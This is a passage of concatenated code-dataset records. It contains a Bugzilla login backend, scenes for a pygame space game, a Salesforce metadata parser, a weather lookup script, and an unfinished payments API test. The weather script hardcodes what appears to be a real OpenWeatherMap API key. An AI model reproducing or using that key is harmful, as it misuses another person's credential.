credentials.')\n settings_form = BugzillaAuthSettingsForm\n\n def bz_error_response(self, request):\n logout(request)\n return PermissionDenied\n\n def authenticate(self, username, password, cookie=False):\n username = username.strip()\n siteconfig = SiteConfiguration.objects.get_current()\n xmlrpc_url = siteconfig.get('auth_bz_xmlrpc_url')\n\n if not xmlrpc_url:\n return None\n\n transport = bugzilla_transport(xmlrpc_url)\n proxy = xmlrpclib.ServerProxy(xmlrpc_url, transport)\n\n if cookie:\n # Username and password are actually bugzilla cookies.\n transport.set_bugzilla_cookies(username, password)\n user_id = username\n else:\n transport.remove_bugzilla_cookies()\n\n try:\n result = proxy.User.login({'login': username,\n 'password': password})\n except xmlrpclib.Fault:\n return None\n\n user_id = result['id']\n\n try:\n user_data = proxy.User.get({'ids': [user_id]})\n except xmlrpclib.Fault:\n return None\n\n users = get_or_create_bugzilla_users(user_data)\n\n if not users:\n return None\n\n user = users[0]\n\n if not user.is_active:\n return None\n\n if not cookie:\n 
(user.bzlogin, user.bzcookie) = transport.bugzilla_cookies()\n\n return user\n\n def get_or_create_user(self, username, request):\n \"\"\"Always check Bugzilla for updates.\"\"\"\n username = username.strip()\n siteconfig = SiteConfiguration.objects.get_current()\n xmlrpc_url = siteconfig.get('auth_bz_xmlrpc_url')\n\n if not xmlrpc_url:\n return None\n\n transport = bugzilla_transport(xmlrpc_url)\n\n if not transport.set_bugzilla_cookies_from_request(request):\n raise self.bz_error_response(request)\n\n proxy = xmlrpclib.ServerProxy(xmlrpc_url, transport)\n\n try:\n user_data = proxy.User.get({'names': [username]})\n except xmlrpclib.Fault:\n raise self.bz_error_response(request)\n\n # Just store the results.\n get_or_create_bugzilla_users(user_data)\n\n try:\n return User.objects.get(username=username)\n except User.DoesNotExist:\n return None\n\n def query_users(self, query, request):\n if not query:\n return\n\n siteconfig = SiteConfiguration.objects.get_current()\n xmlrpc_url = siteconfig.get('auth_bz_xmlrpc_url')\n\n if not xmlrpc_url:\n return None\n\n transport = bugzilla_transport(xmlrpc_url)\n\n if not transport.set_bugzilla_cookies_from_request(request):\n raise PermissionDenied\n\n proxy = xmlrpclib.ServerProxy(xmlrpc_url, transport)\n\n try:\n get_or_create_bugzilla_users(proxy.User.get({'match': [query]}))\n except xmlrpclib.Fault:\n raise PermissionDenied\n","sub_path":"rbbz/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"247776835","text":"import pygame as pg\n\nimport sys, os\n\nfrom scene import *\nfrom tools import *\nfrom folders import *\nfrom config import *\nfrom BBDD import BBDD\n\nfrom the_quest.sprites import *\nfrom the_quest.optional_screens import *\n\nclass InitialAnimation(Scene):\n '''\n Class for show initial animation of Title\n '''\n def __init__(self):\n Scene.__init__(self)\n\n self.x_pos_ship = 800 # For the movement of ship\n self.y_pos_ship = 110\n self.x_pos_title = 848 # For the movement of Title\n self.y_pos_title = 75\n\n def update(self, screen, dt):\n screen.fill(BLACK)\n\n load_and_draw_image(screen, SHIP_TITLE, x=self.x_pos_ship, y=self.y_pos_ship)\n create_draw_text(screen, TITLE, 120, 'THE QUEST', WHITE, pos_x=self.x_pos_title, pos_y=self.y_pos_title)\n\n self.x_pos_ship -= 5\n if self.x_pos_title > 68.0:\n self.x_pos_title -= 5\n if self.x_pos_ship <= -60:\n # When title is on position we switch to TitleScene\n self.switchToScene(TitleScene())\n \n pg.display.flip()\n\nclass TitleScene(Scene):\n '''\n Class who draws the TitleScene\n '''\n def __init__(self):\n Scene.__init__(self)\n\n self.option = 0\n\n # Title Music\n self.title_sound = TITLE_BG_SOUND\n self.title_sound.set_volume(DEFAULT_VOL)\n self.title_sound.play()\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_DOWN:\n if self.option < 3:\n self.option += 1\n OPTION_SOUND.play()\n if event.key == pg.K_UP:\n if self.option > 0:\n self.option -= 1\n OPTION_SOUND.play()\n if event.key == pg.K_SPACE:\n SELECTED_SOUND.play()\n self._check_op()\n\n def _check_op(self):\n '''\n Method to know which option was choosed.\n We switch to that Scene\n ''' \n if self.option == 0:\n # Start New Game\n self.title_sound.stop()\n self.switchToScene(Fade(BACKGROUND, Transition(Level1(GameOver()), 3, 0)))\n elif self.option == 1:\n # How To Play Screen\n self.title_sound.stop()\n 
self.switchToScene(HowToPlay())\n elif self.option == 2:\n self.title_sound.stop()\n self.switchToScene(Records())\n else:\n # Exit Game\n self.terminateScene()\n\n def update(self, screen, dt):\n screen.fill(BLACK)\n create_draw_text(screen, TITLE, 120, 'THE QUEST', WHITE, position='topcenter')\n \n self._draw_options(screen)\n\n pg.display.flip()\n\n def _draw_options(self, screen):\n '''\n Method that shows in red color the actual option selected\n '''\n \n text = ['New Game', 'How To Play', 'Records', 'Exit']\n pos = ['center', 'closecenterbottom', 'closecenterbottom2', 'closecenterbottom3']\n\n for x in range(4):\n if x == self.option:\n create_draw_text(screen, SPACE2, 36, text[x], RED, position=pos[x])\n else:\n create_draw_text(screen, SPACE2, 36, text[x], WHITE, position=pos[x])\n\nclass HowToPlay(Scene):\n '''\n Class To show How To Play page 1\n '''\n def __init__(self):\n Scene.__init__(self)\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_RIGHT:\n self.switchToScene(HowToPlay2())\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n \n self._draw_main_text(screen)\n self._draw_keys(screen)\n self._draw_keys_text(screen)\n\n pg.display.update()\n\n def _draw_main_text(self, screen):\n create_draw_text(screen, SPACE2, 54, 'HOW TO PLAY', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 36, 'Keys to use:', WHITE, position='closecenterup')\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to go Main Menu', WHITE, position='bottomcenter')\n create_draw_text(screen, SPACE2, 16, 'Press to next page', WHITE, pos_x=460, pos_y=552)\n create_draw_text(screen, SPACE2, 20, '1/3', WHITE, pos_x=720, pos_y=550)\n\n def _draw_keys(self, screen):\n images = {\n 1:{\n 'img':UP_KEY,\n 'x':40,\n 'y':250\n },\n 2:{\n 'img':DOWN_KEY,\n 'x':40,\n 'y':330\n },\n 3:{\n 'img':SPACEBAR_KEY,\n 'x':390,\n 'y':250\n },\n 4:{\n 'img':ESCAPE_KEY,\n 'x':390,\n 'y':330\n },\n 5:{\n 'img':P_KEY,\n 'x':250,\n 'y':405\n }\n }\n for x in range(1,6):\n load_and_draw_image(screen, images[x]['img'], images[x]['x'], images[x]['y'])\n \n def _draw_keys_text(self, screen):\n text = {\n 1:{\n 'text':'Moves ship up',\n 'x':120,\n 'y':270,\n },\n 2:{\n 'text':'Moves ship down',\n 'x':120,\n 'y':350,\n },\n 3:{\n 'text':'Action/Accept Key',\n 'x':520,\n 'y':270,\n },\n 4:{\n 'text':'Quit the game',\n 'x':520,\n 'y':350,\n },\n 5:{\n 'text':'Pause the game',\n 'x':360,\n 'y':425,\n },\n }\n for x in range(1,6):\n create_draw_text(screen, SPACE2, 24, text[x]['text'], WHITE, pos_x=text[x]['x'], pos_y=text[x]['y']) \n\nclass HowToPlay2(Scene):\n '''\n Class To show How To Play page 2\n '''\n def __init__(self):\n Scene.__init__(self)\n self.bg_img = BACKGROUND\n self.ship_img = SHIP\n self.planet = JUPITER\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_LEFT:\n self.switchToScene(HowToPlay())\n if event.key == pg.K_RIGHT:\n self.switchToScene(HowToPlay3())\n\n def update(self, screen, dt):\n screen.blit(self.bg_img, (0, 0))\n screen.blit(self.planet, (530, 50))\n screen.blit(self.ship_img, (2, (HEIGHT/2)-24))\n\n self._top_level_menu(screen)\n self._draw_main_text(screen)\n self._landing_lines(screen)\n self._landing_messages(screen)\n\n pg.display.flip()\n\n def _draw_main_text(self, screen):\n create_draw_text(screen, SPACE2, 
50, 'POSITIONS TO LAND', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 16, 'Press to switch page', WHITE, pos_x=80, pos_y=552)\n create_draw_text(screen, SPACE2, 20, '2/3', WHITE, pos_x=20, pos_y=550)\n\n def _top_level_menu(self, screen):\n top_level_img = TOP_LEVEL\n top_level_img_rect = top_level_img.get_rect()\n\n text_to_draw = [('Lifes - 3', 50), ('Meteors Dodged - 0', 240), ('Score - 0', 580)]\n for element in text_to_draw:\n create_draw_text(screen, SPACE2, 24, element[0], WHITE, pos_x=element[1], pos_y=10)\n \n screen.blit(top_level_img, (0, 0))\n\n def _landing_lines(self, screen):\n\n # Rotating Zone\n pg.draw.line(screen, SILVER, (0, 70), (20, 70))\n pg.draw.line(screen, SILVER, (0, HEIGHT-20), (20, HEIGHT-20))\n\n # Perfect Landing\n pg.draw.line(screen, GREEN, (0, (HEIGHT/2)-40), (20, (HEIGHT/2)-40))\n pg.draw.line(screen, GREEN, (0, (HEIGHT/2)+40), (20, (HEIGHT/2)+40))\n\n # Succesfully Landing\n pg.draw.line(screen, ORANGE, (0, (HEIGHT/2)-80), (20, (HEIGHT/2)-80))\n pg.draw.line(screen, ORANGE, (0, (HEIGHT/2)+80), (20, (HEIGHT/2)+80))\n\n # Not Bad Landing\n pg.draw.line(screen, RED, (0, (HEIGHT/2)-120), (20, (HEIGHT/2)-120))\n pg.draw.line(screen, RED, (0, (HEIGHT/2)+120), (20, (HEIGHT/2)+120))\n\n def _landing_messages(self, screen):\n\n create_draw_text(screen, SPACE2, 16, 'ROTATING ZONE', SILVER, pos_x=25 ,pos_y=63)\n create_draw_text(screen, SPACE2, 16, 'PERFECT LANDING', GREEN, pos_x=25 ,pos_y=(HEIGHT/2)-47)\n create_draw_text(screen, SPACE2, 16, 'SUCCESSFULLY LANDING', ORANGE, pos_x=25 ,pos_y=(HEIGHT/2)-87)\n create_draw_text(screen, SPACE2, 16, 'NOT BAD LANDING', RED, pos_x=25 ,pos_y=(HEIGHT/2)-127)\n\nclass HowToPlay3(Scene):\n '''\n Class To show How To Play page 3\n '''\n def __init__(self):\n Scene.__init__(self)\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_LEFT:\n self.switchToScene(HowToPlay2())\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n\n self._draw_main_text(screen)\n self._draw_landing_text(screen)\n self._draw_lifes_text(screen)\n\n pg.display.flip()\n\n def _draw_main_text(self, screen):\n create_draw_text(screen, SPACE2, 50, 'ADDITIONAL BONUS', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 20, '- At the end of each level we can get a bonus based on:', WHITE, pos_x=100, pos_y=150)\n create_draw_text(screen, SPACE2, 16, 'Press to previous page', WHITE, pos_x=80, pos_y=552)\n create_draw_text(screen, SPACE2, 20, '3/3', WHITE, pos_x=20, pos_y=550)\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to go Main Menu', WHITE, position='bottomcenter')\n \n def _draw_landing_text(self, screen):\n create_draw_text(screen, SPACE2, 20, '- Landing:', WHITE, pos_x=200, pos_y=200)\n create_draw_text(screen, SPACE2, 20, 'PERFECT = 1000 pts', GREEN, pos_x=330, pos_y=200)\n create_draw_text(screen, SPACE2, 20, 'SUCCESSFULLY = 500 pts', ORANGE, pos_x=330, pos_y=240)\n create_draw_text(screen, SPACE2, 20, 'NOT BAD = 250 pts', RED, pos_x=330, pos_y=280)\n\n def _draw_lifes_text(self, screen):\n create_draw_text(screen, SPACE2, 20, '- Lifes:', WHITE, pos_x=200, pos_y=330)\n create_draw_text(screen, SPACE2, 20, '3 LIFES = 1000 pts', GREEN, pos_x=330, pos_y=330)\n create_draw_text(screen, SPACE2, 20, '2 LIFES = 500 pts', ORANGE, pos_x=330, pos_y=370)\n create_draw_text(screen, SPACE2, 20, '1 LIFE = 250 pts', RED, pos_x=330, pos_y=410)\n\nclass Records(Scene):\n '''\n 
Class To show Records\n '''\n def __init__(self):\n Scene.__init__(self)\n\n BBDD()._set_records_to_five()\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_r:\n BBDD().reset_records()\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n\n self._draw_static_text(screen)\n self._draw_records(screen)\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to go Main Menu', WHITE, position='bottomcenter')\n\n pg.display.flip()\n\n def _draw_static_text(self, screen):\n # Draws static text\n create_draw_text(screen, SPACE2, 20, 'Press R to reset records', WHITE, pos_x=10, pos_y=10)\n create_draw_text(screen, SPACE2, 54, 'RECORDS', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 28, 'RANK', WHITE, pos_x=150, pos_y=180)\n create_draw_text(screen, SPACE2, 28, 'SCORE', WHITE, pos_x=340, pos_y=180)\n create_draw_text(screen, SPACE2, 28, 'NAME', WHITE, pos_x=550, pos_y=180)\n\n def _draw_records(self, screen):\n # Records stored in our database\n records = BBDD().get_dict_records(BBDD()._select_records())\n\n # Draws records\n rank_y=230\n for x in range(1,6):\n create_draw_text(screen, SPACE2, 24, records[f'record{x}']['rank'], records[f'record{x}']['color'], pos_x=190, pos_y=rank_y)\n create_draw_text(screen, SPACE2, 24, str(records[f'record{x}']['score']), records[f'record{x}']['color'], pos_x=350, pos_y=rank_y)\n create_draw_text(screen, SPACE2, 24, records[f'record{x}']['name'], records[f'record{x}']['color'], pos_x=560, pos_y=rank_y)\n rank_y += 40\n\nclass Fade(Scene):\n '''\n Class to makes the fade from one scene to another\n next_level_bg = we indicate the background of next level\n to make a soft fade, only if its a fade to a level game, \n else, we indicate as None and we use fade surface\n next_scene = to indicate the next scene after the fade\n effect\n '''\n def __init__(self, next_level_bg, next_scene):\n Scene.__init__(self)\n self.fade = pg.Surface((WIDTH, HEIGHT))\n self.fade.fill(BLACK)\n self.nxt_lvl_bg = next_level_bg\n self.next_scene = next_scene\n\n def update(self, screen, dt):\n \n self._fade_out(screen)\n self._fade_in(screen)\n self.switchToScene(self.next_scene)\n\n def _fade_out(self, screen):\n for alpha in range(0, 255):\n self.fade.set_alpha(alpha) \n screen.blit(self.fade, (0,0))\n pg.display.flip()\n\n def _fade_in(self, screen):\n for alpha in range(255, 0, -1):\n self.fade.set_alpha(alpha)\n if self.nxt_lvl_bg:\n screen.blit(self.nxt_lvl_bg, (0,0))\n else:\n screen.blit(self.fade, (0,0))\n screen.blit(self.fade, (0,0))\n pg.display.flip()\n pg.time.delay(5)\n\nclass Transition(Scene):\n '''\n Class who makes the animation of top level and ship appears\n at same time\n next_level = indicates the next level to start\n lifes = to show in top level the remaining lifes if isn't the\n first level\n score = same as lifes\n '''\n def __init__(self, next_level, lifes, score):\n Scene.__init__(self)\n\n self.ship_img = SHIP\n self.ix_pos = -50\n self.next_level = next_level\n self.lifes = lifes\n self.score = score\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE and self.ix_pos == 0:\n self.switchToScene(self.next_level)\n\n def update(self, screen, dt):\n self.ticks += dt\n\n load_and_draw_image(screen, BACKGROUND)\n load_and_draw_image(screen, TOP_LEVEL, y=self.ix_pos)\n\n create_draw_text(screen, SPACE2, 24, f'Lifes - 
{self.lifes}', WHITE, pos_x=50, pos_y=self.ix_pos+10)\n create_draw_text(screen, SPACE2, 24, 'Meteors Dodged - 0' , WHITE, pos_x=240, pos_y=self.ix_pos+10)\n create_draw_text(screen, SPACE2, 24, f'Score - {self.score}', WHITE, pos_x=580, pos_y=self.ix_pos+10)\n\n screen.blit(self.ship_img, (self.ix_pos, 276))\n\n if self.ix_pos == 0:\n create_draw_text(screen, SPACE2, 54, 'READY?', WHITE, position='closecenterup')\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to start', WHITE, position='center')\n\n if self.ix_pos != 0:\n if self.ticks >= 85:\n self.ix_pos += 1\n self.ticks = 0\n\n pg.display.flip()\n\nclass Level1(LevelScene):\n '''\n Class for first level of game\n go_scene = GameOver scene if ship state is \"DEAD\"\n '''\n def __init__(self, go_scene):\n LevelScene.__init__(self, go_scene)\n self.planet_name = 'JUPITER'\n self.planet = JUPITER\n self.rect_planet = self.planet.get_rect(x=WIDTH, y=50)\n\n def _keydown_events(self, event, screen):\n LevelScene._keydown_events(self, event, screen)\n # Click for finish level\n if self.ship.state == STATES['HIDDEN']:\n # Level Finished\n self.ship._prepare_ship()\n self.bg_sound.stop()\n self.switchToScene(Fade(BACKGROUND, (Transition(Level2(GameOver(),self.score, self.ship.lifes), self.ship.lifes, self.score))))\n\n if event.key == pg.K_p and self.ship.state == STATES['ALIVE']:\n # Pause Menu\n pg.mixer.pause()\n reset, main_menu = self.pause_screen.on_pause(screen)\n if reset:\n pg.mixer.stop()\n self._reset(all_data=True)\n self.switchToScene(Transition(Level1(GameOver()), self.ship.lifes, self.score))\n if main_menu:\n pg.mixer.stop()\n self.switchToScene(TitleScene())\n pg.mixer.unpause()\n \n def _reset(self, all_data=False):\n LevelScene._reset(self)\n self.score = 0\n if all_data:\n self.ship.lifes = LIFES\n\nclass Level2(AdvancedLevelScene):\n '''\n Class for second level of game\n score = for add the last score from last level\n lifes = same as score\n '''\n\n def __init__(self, go_scene, score, lifes):\n AdvancedLevelScene.__init__(self, go_scene, score, lifes)\n self.planet_name = 'MARS'\n self.planet = MARS\n self.rect_planet = self.planet.get_rect(x=WIDTH, y=50)\n self.level = 2\n\n def _keydown_events(self, event, screen):\n '''\n We check if our final score is better than our database\n records scores. 
If beats anyone of them, we will switch\n to NewRecord scene, else, to NoRecord scene\n '''\n LevelScene._keydown_events(self, event, screen)\n # Click for finish level\n if self.ship.state == STATES['HIDDEN']:\n # Level Finished\n self.ship._prepare_ship()\n self.bg_sound.stop()\n if BBDD().check_new_record(self.score):\n self.switchToScene(Fade(None, NewRecord(self.score))) # <- Scene Next Level/Records\n else:\n self.switchToScene(Fade(None, NoRecord()))\n if event.key == pg.K_p and self.ship.state == STATES['ALIVE']:\n # Pause Menu\n pg.mixer.pause()\n reset, main_menu = self.pause_screen.on_pause(screen)\n if reset:\n pg.mixer.stop()\n self._reset(all_data=True)\n self.switchToScene(Transition(Level2(GameOver(), self.score, self.ship.lifes), self.ship.lifes, self.score))\n if main_menu:\n pg.mixer.stop()\n self.switchToScene(TitleScene())\n pg.mixer.unpause()\n \n def _reset(self, all_data=False):\n AdvancedLevelScene._reset(self)\n if all_data:\n self.ship.lifes = self.remaining_lifes\n\nclass GameOver(Scene):\n '''\n Class who draws GameOver scene\n '''\n\n def __init__(self):\n Scene.__init__(self)\n \n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n\n def update(self, screen, dt):\n self.ticks += dt\n\n screen.fill(BLACK)\n \n create_draw_text(screen, SPACE2, 64, 'GAME OVER', WHITE, position='center')\n \n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to Main Menu', WHITE, position='bottomcenter')\n \n pg.display.flip()\n\nclass NewRecord(Scene):\n '''\n Class who draws the NewRecord scene\n '''\n\n def __init__(self, score):\n Scene.__init__(self)\n self.bg_sound = NEW_RECORD_SOUND\n self.bg_sound.set_volume(DEFAULT_VOL)\n self.bg_sound.play()\n\n n = [x for x in range(1,27)]\n l = [x for x in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']\n self.options = dict(zip(n, l)) \n\n self.sel_option = 1\n self.l = [] # For store the letters we put in NewRecord\n\n self.record = score\n self.recorded = False\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_UP and self.sel_option > 1:\n self.sel_option -= 1\n OPTION_SOUND.play()\n if event.key == pg.K_DOWN and self.sel_option < 26:\n self.sel_option += 1\n OPTION_SOUND.play()\n if event.key == pg.K_SPACE: \n if len(self.l) != 3:\n self.l.append(self.options[self.sel_option])\n self.sel_option = 1\n else:\n if not self.recorded:\n name = ''.join(self.l)\n # Inserting new record\n BBDD().insert_new_record((self.record, name))\n self.recorded = True\n else:\n self.switchToScene(TitleScene())\n self.bg_sound.stop()\n SELECTED_SOUND.play()\n\n\n def update(self, screen, dt):\n self.ticks += dt\n\n screen.fill(BLACK)\n\n create_draw_text(screen, SPACE2, 54, 'NEW RECORD!', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 42, 'SCORE :', WHITE, pos_x=220, pos_y=220)\n create_draw_text(screen, SPACE2, 42, str(self.record), WHITE, pos_x=400, pos_y=220)\n create_draw_text(screen, SPACE2, 32, 'INSERT YOUR NAME HERE :', WHITE, pos_x=180, pos_y=320)\n\n self._draw_name(screen)\n\n pg.display.flip()\n\n def _draw_name(self, screen):\n \n x = 590 # x position for letters\n\n if not self.l: # No letters yet\n create_draw_text(screen, SPACE2, 26, self.options[self.sel_option], WHITE, pos_x=x, pos_y=325)\n\n else: # if letters writted\n for element in self.l:\n create_draw_text(screen, SPACE2, 26, element, WHITE, pos_x=x, pos_y=325)\n x += 30\n\n if len(self.l) < 3: # Not all 
letters writted\n create_draw_text(screen, SPACE2, 26, self.options[self.sel_option], WHITE, pos_x=x, pos_y=325)\n\n else: # All letters writted\n\n if not self.recorded: # Record no saved yet\n self._blink_message(screen, SPACE2, 26, 'Press < SPACE > to enter your record', WHITE, position='bottomcenter')\n\n else: # Record saved\n create_draw_text(screen, SPACE2, 26, 'RECORD ADDED SUCCESFULLY!', RED, pos_x=200, pos_y=400)\n self._blink_message(screen, SPACE2, 26, 'Press < SPACE > to go to main menu', WHITE, position='bottomcenter')\n\nclass NoRecord(Scene):\n '''\n Class who draws the NoRecord scene\n '''\n def __init__(self):\n Scene.__init__(self)\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n\n create_draw_text(screen, SPACE2, 54, 'NO RECORD HAS BEEN BEATED', WHITE, position='topcenter')\n self._blink_message(screen, SPACE2, 26, 'Press < SPACE > to go to main menu', WHITE, position='bottomcenter')\n\n pg.display.flip()","sub_path":"the_quest/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":23281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"511201029","text":"''' MatchingRules Module '''\nfrom modules.parser.models import (ChildMetadataType, CompoundMetadataType,\n MetadataType, get_child_objects)\n\n\nclass MatchingRule(CompoundMetadataType):\n ''' Custom Label Child Metadata Implementation '''\n TAG_NAME = 'matchingRules'\n PACKAGE_NAME = 'MatchingRule'\n ID_ATTRIBUTE = 'fullName'\n\n def __hash__(self):\n return hash(str(self))\n\n class MatchingRuleItem(ChildMetadataType):\n ''' Rule Entry - Assigment Rule implementation '''\n TAG_NAME = 'matchingRuleItems'\n ID_ATTRIBUTE = 'fieldName'\n\n CHILD_OBJECTS = {'matchingRuleItems': MatchingRuleItem}\n\n\nclass MatchingRules(MetadataType):\n ''' Custom Labels Metadata Implementation '''\n TAG_NAME = 'MatchingRules'\n PACKAGE_NAME = 'MatchingRules'\n CHILD_OBJECTS = get_child_objects(__name__)\n FOLDER_NAME = 'matchingRules'\n EXTENSION_NAME = 'matchingRule'\n CHILD_SEPARATOR = '.'\n","sub_path":"merger/modules/parser/models/matching_rules.py","file_name":"matching_rules.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"62645369","text":"\r\n# Import requests json and time to use throughout the pogram.\r\nimport requests\r\nimport json\r\nimport time\r\n\r\nprint(\"Program starting...\")\r\ntime.sleep(0.5)\r\n\r\nprint(\"\"\"\r\n****WELCOME TO THE WEATHER PROGRAM***\r\n\"\"\")\r\n\r\ntime.sleep(0.5)\r\n# Use a function to get the data for our weather program.\r\ndef weather_data(base_url, api_key):\r\n \r\n city_name = input(\"Enter city name: \")\r\n # If statement to make sure the user only entered letters when entering a city..\r\n if city_name.replace(\" \", \"\").isalpha() == False:\r\n print(\"Please enter valid city name: \")\r\n time.sleep(0.5)\r\n print(\"Please try again, with letters only.\")\r\n city_name = input(\"Enter city name: \")\r\n\r\n zip_code = input(\"Enter zip code: \")\r\n # If statement to make sure the user only entered numbers when entering a zip code.\r\n if zip_code.isdigit() == False:\r\n print(\"Please enter a valid zip code.\")\r\n time.sleep(0.5)\r\n print(\"Please try again, with numbers only.\")\r\n zip_code = input(\"Enter zip code: \")\r\n # 
 # Elif statement to make sure the zip code the user entered is exactly 5 digits.\r\n elif len(zip_code) != 5:\r\n print(\"Please enter exactly 5 digits for zip code.\")\r\n time.sleep(0.5)\r\n zip_code = input(\"Enter zip code: \")\r\n \r\n quit = False\r\n # While loop to loop through the program until the user wants to stop.\r\n while quit == False:\r\n # Try block to try out the data and check if it works.\r\n try:\r\n complete_url = base_url + city_name + ','+ zip_code + \"&appid=\" + api_key\r\n # Use requests to get data from the website.\r\n response = requests.get(complete_url)\r\n # Use json to make the data readable to the user.\r\n w_data = response.json()\r\n\r\n description = w_data['weather'][0]['description']\r\n humidity = w_data['main']['humidity']\r\n wind = w_data['wind']['speed']\r\n # We convert kelvin to fahrenheit.\r\n temp = (w_data['main']['temp'] - 273.15) * (9/5) + 32\r\n temp_min = (w_data['main']['temp_min'] - 273.15) * (9/5) + 32\r\n temp_max = (w_data['main']['temp_max'] - 273.15) * (9/5) + 32\r\n feels_like = (w_data['main']['feels_like'] - 273.15) * (9/5) + 32\r\n\r\n print(\"\\n\")\r\n print(\"Loading your weather data...\\n\")\r\n\r\n time.sleep(.75)\r\n\r\n print(\"---------------------------\")\r\n print(\"Today's Forecast for {}\".format(city_name))\r\n print(\"---------------------------\\n\")\r\n print(\"Day:\\t\\t{}\".format(description))\r\n print(\"Temp now:\\t{}\".format(round(temp,1)))\r\n print(\"Humidity:\\t{}\".format(humidity))\r\n print(\"Temp low:\\t{}\".format(round(temp_min,1)))\r\n print(\"Temp high:\\t{}\".format(round(temp_max,1)))\r\n print(\"Wind:\\t\\t{}mph\".format(wind))\r\n print(\"Feels like:\\t{}\".format(round(feels_like,1)))\r\n # Except clause to send back a message to the user if a key error was found.\r\n except KeyError:\r\n print('Sorry. The weather data was not found for the info you entered.')\r\n # Except clause to send a message back to the user if any other error happens.\r\n except Exception:\r\n print('Sorry. Something went wrong.')\r\n \r\n user_input = input(\"Would you like to try again? (Y|N) \")\r\n # If statement to loop through the program again if the user enters \"Y\" and wants to find weather data another time.\r\n if user_input.upper() == 'Y':\r\n city_name = input(\"Enter city: \")\r\n # If statement to make sure the user only entered letters when entering a city.\r\n if city_name.replace(\" \", \"\").isalpha() == False:\r\n print(\"Please enter a valid city name: \")\r\n time.sleep(0.5)\r\n print(\"Please try again, with letters only.\")\r\n city_name = input(\"Enter city name: \")\r\n\r\n zip_code = input(\"Enter zip code: \")\r\n # If statement to make sure the user only entered numbers when entering a zip code.\r\n if zip_code.isdigit() == False:\r\n print(\"Please enter a valid zip code.\")\r\n time.sleep(0.5)\r\n print(\"Please try again, with numbers only.\")\r\n zip_code = input(\"Enter zip code: \")\r\n # Elif statement to make sure the zip code the user entered is exactly 5 digits.\r\n elif len(zip_code) != 5:\r\n print(\"Please enter exactly 5 digits for zip code.\")\r\n time.sleep(0.5)\r\n zip_code = input(\"Enter zip code: \")\r\n # Elif statement to end the program if the user enters \"N\" and wants to quit.\r\n\r\n elif user_input.upper() == 'N':\r\n print(\"Program exiting...\")\r\n time.sleep(.75)\r\n print(\"See you next time!\")\r\n quit = True\r\n # Else statement to tell the user they entered an invalid input if they don't enter \"Y\" or \"N\".
\r\n else:\r\n print(\"Invalid input\")\r\n city_name = input(\"Enter city: \")\r\n zip_code = input(\"Enter zip code: \")\r\n\r\n\r\n# Use a main function to execute the weather_data function.\r\ndef main():\r\n api_key = '55592219da64379c5a1872dccb250590'\r\n base_url = 'http://api.openweathermap.org/data/2.5/weather?q='\r\n\r\n weather_data(base_url, api_key)\r\n\r\n\r\n# If statement to make sure we are running as the main program.\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"Yitzchok Shear Final Program.py","file_name":"Yitzchok Shear Final Program.py","file_ext":"py","file_size_in_byte":5263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653650895","text":"# -*- coding: utf-8 -*-\n__author__ = 'Jun'\n\nfrom bs4 import BeautifulSoup\nimport json\nimport requests\nimport random\nimport datetime\n# import MySQLdb\nimport re\nimport sys\nfrom decimal import Decimal as D\nfrom commons import common\nfrom commons.const import const\nfrom testCase.users import testGetUser as users\nfrom testCase.departments import testGetDepartment as departmentid\nfrom testCase.customers.testAddCustomer import AddCustomer\nfrom testCase.contracts.testAddContract import AddContract\n\n\nclass AddReceivedPayment:\n def __init__(self, cookie, csrf):\n self.common = common.Common(cookie, csrf)\n self.base_url = const.BASE_URL\n self.csrf = csrf\n self.cookie = cookie\n self.response = ''\n self.user_id = ''\n self.customers_id = []\n self.params = ''\n self.user = users.GetUser(cookie, csrf)\n self.DepartmentId = departmentid.GetDepartment(cookie, csrf)\n self.testAddCustomer = AddCustomer(cookie, csrf)\n self.testAddContract = AddContract(cookie, csrf)\n self.customer_id = ''\n self.contract_id = ''\n pass\n\n\n\n # Add a new received-payment plan\n def add_received_payment_plans(self):\n url = self.base_url +'api/received_payments'\n body = {\n 'utf8': 